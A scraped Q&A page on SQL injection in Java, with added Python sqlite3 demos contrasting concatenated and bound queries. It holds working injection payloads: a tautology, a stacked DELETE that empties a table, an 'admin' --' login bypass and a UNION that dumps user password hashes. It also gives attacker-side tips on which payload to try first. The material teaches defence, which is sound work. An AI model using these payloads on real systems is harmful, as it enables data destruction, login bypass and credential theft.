
SQL Injection Guide In Java (or any other language)

I have JSP code which has a query like

'select * from MyTable where Column1='+request.getParameter('q'),

which is executed from a java.sql.Statement. Now, provided we can append to the query by using the request parameter, my target is to change the query to something like:

Select * from MyTable where Column1 = a; Delete from MyTable;

Since the original select query is executed through java.sql.Statement, how can we do such SQL injection? If the question is not clear, kindly comment, I'll try to provide further explanations.

SQL Injection Guide: Link1 & Link2, but there are so many relevant threads on Stack Overflow regarding SQL injection, like Q & A.

Do one thing: search for -> sql injection java stackoverflow

If we inject q as anything' OR 'x'='x then it will select all the columns, which can be vulnerable. This is because variables passed as arguments to prepared statements will automatically be escaped by the JDBC driver.

Although Prepared Statements help in defending against SQL Injection, there are possibilities of SQL Injection attacks through inappropriate usage of Prepared Statements. The example below explains such a scenario, where the input variables are passed directly into the Prepared Statement, thereby paving the way for SQL Injection attacks.
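The question's concatenated Statement, the anything' OR 'x'='x payload from the answer two above, and the prepared-statement misuse described in the answer just above, as an added example that is not part of the original thread. The page's code is Java, but the behaviour is the same in any language, so this uses Python's standard-library sqlite3 and runs with no database server. MyTable, its rows and the payloads are constructed for the demo. The Java mapping is: query_concat is Statement.executeQuery("..." + request.getParameter("q")), query_prepared_misused is prepareStatement("..." + q) with no ? in the text, and query_bound is prepareStatement("... = ?") followed by setString(1, q).

```python
import sqlite3

# Constructed sample rows standing in for the page's MyTable.
ROWS = [("a", "first"), ("b", "second"), ("c", "third")]


def fresh_db():
    """In-memory SQLite database holding the page's MyTable (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE MyTable (Column1 TEXT, Column2 TEXT)")
    conn.executemany("INSERT INTO MyTable VALUES (?, ?)", ROWS)
    return conn


def query_concat(conn, q):
    """The question's pattern: the request parameter is glued into the SQL text,
    which is what java.sql.Statement.executeQuery("..." + q) does."""
    sql = "SELECT * FROM MyTable WHERE Column1 = '" + q + "'"
    return conn.execute(sql).fetchall()


def query_prepared_misused(conn, q):
    """The trap from the answer above: the statement is 'prepared', but the input is
    already inside the SQL text, so there is no placeholder for the driver to bind
    and escape. Equivalent to conn.prepareStatement("..." + q) with no '?' in Java."""
    sql = "SELECT * FROM MyTable WHERE Column1 = '" + q + "'"
    return conn.execute(sql, ()).fetchall()


def query_bound(conn, q):
    """Correct use: a placeholder in the SQL text and the value passed separately.
    The input travels as data and is never parsed as SQL, like
    prepareStatement("... = ?") followed by setString(1, q)."""
    return conn.execute("SELECT * FROM MyTable WHERE Column1 = ?", (q,)).fetchall()


def stacked_query(conn, q, driver_accepts_batches):
    """The question's goal: close the quoted value and append 'DELETE FROM MyTable'.
    Whether a second statement runs is decided by the driver, not by the use of
    Statement: sqlite3's execute() refuses it, and MySQL Connector/J refuses it
    unless the JDBC URL sets allowMultiQueries=true. executescript() stands in
    for a driver that accepts batches. Returns the number of rows left in MyTable."""
    sql = "SELECT * FROM MyTable WHERE Column1 = '" + q + "'"
    if driver_accepts_batches:
        conn.executescript(sql)          # runs the SELECT, then the injected DELETE
    else:
        try:
            conn.execute(sql)
        except (sqlite3.Warning, sqlite3.Error):
            pass                         # 'You can only execute one statement at a time.'
    return conn.execute("SELECT COUNT(*) FROM MyTable").fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    payload = "anything' OR 'x'='x"
    print(query_concat(db, "a"))                     # [('a', 'first')]
    print(query_concat(db, payload))                 # all three rows
    print(query_prepared_misused(db, payload))       # all three rows again
    print(query_bound(db, payload))                  # []
    stack = "a'; DELETE FROM MyTable WHERE '1'='1"
    print(stacked_query(db, stack, driver_accepts_batches=False))   # 3, nothing deleted
    print(stacked_query(db, stack, driver_accepts_batches=True))    # 0, table emptied
```

The two payloads differ in what they need from the driver. The tautology rides inside the single statement the application already sends, so it works against every driver and is the payload to try first. The stacked DELETE needs the driver to accept a second statement in one call, which sqlite3 and a default MySQL Connector/J connection do not; the application's use of Statement rather than PreparedStatement does not change that, it only decides whether the input reaches the parser as SQL at all.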

Check out this article, which explains how Statement and PreparedStatement, as well as executeQuery() and executeUpdate(), behave when it comes to SQL Injection.

Apart from the classic DROP tables, there are more scenarios to watch out for, like:

  • calling a sleep function so that all your database connections are busy, making your application unavailable
  • extracting sensitive data from the DB
  • bypassing the user authentication

And it's not just SQL that can be affected. Even JPQL can be compromised if you are not using bind parameters.

Bottom line, you should never use string concatenation when building SQL statements. Use a dedicated API for that purpose:
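Two of the scenarios listed in the answer above, bypassing the user authentication and extracting sensitive data, as an added example that is not part of the original thread. It again uses Python's standard-library sqlite3, since the behaviour does not depend on the language; the Users table, its rows and the sha256 placeholder hashing are constructed for the demo, and the Java equivalents are the same Statement concatenation and PreparedStatement binding the thread discusses.

```python
import hashlib
import sqlite3

# Constructed demo data. sha256 keeps the example self-contained; a real
# application stores passwords with a slow, salted KDF (bcrypt, scrypt, Argon2).
USERS = [("admin", "admin-pw", "admin"), ("alice", "alice-pw", "user")]
ROWS = [("a", "first"), ("b", "second")]


def pw_hash(password):
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory SQLite with a login table and the page's MyTable (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (name TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [(n, pw_hash(p), r) for n, p, r in USERS])
    conn.execute("CREATE TABLE MyTable (Column1 TEXT, Column2 TEXT)")
    conn.executemany("INSERT INTO MyTable VALUES (?, ?)", ROWS)
    return conn


# --- bypassing the user authentication ---------------------------------------

def login_concat(conn, user, password):
    """Vulnerable: the user name is concatenated into the SQL text. A name of
    "admin' --" closes the quote and comments out the password check entirely."""
    sql = ("SELECT role FROM Users WHERE name = '" + user
           + "' AND password_hash = '" + pw_hash(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(conn, user, password):
    """Safe: both values are bound parameters, so the quote and '--' are just
    characters compared against the name column."""
    row = conn.execute("SELECT role FROM Users WHERE name = ? AND password_hash = ?",
                       (user, pw_hash(password))).fetchone()
    return row[0] if row else None


# --- extracting sensitive data from the DB ------------------------------------

def lookup_concat(conn, q):
    """Vulnerable lookup on the page's MyTable. A UNION payload with the same number
    of columns pulls rows from an unrelated table into the result the page renders."""
    sql = "SELECT Column1, Column2 FROM MyTable WHERE Column1 = '" + q + "'"
    return conn.execute(sql).fetchall()


def lookup_bound(conn, q):
    return conn.execute("SELECT Column1, Column2 FROM MyTable WHERE Column1 = ?",
                        (q,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "admin' --", "wrong"))      # admin: logged in without the password
    print(login_bound(db, "admin' --", "wrong"))       # None
    leak = "x' UNION SELECT name, password_hash FROM Users --"
    print(lookup_concat(db, leak))                     # every user's name and hash
    print(lookup_bound(db, leak))                      # []
```

The UNION payload only works because it selects the same number of columns as the original query; against the question's SELECT * the attacker first has to discover that count, which is routine. The sleep scenario in the list above is the same concatenation with a payload that calls the database's sleep function (SLEEP() on MySQL) and is not shown here because SQLite has no such function.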

Notice: the technical posts on this site are provided under the CC BY-SA 4.0 license; if you reproduce them, please credit this site or the original source. For any questions contact yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM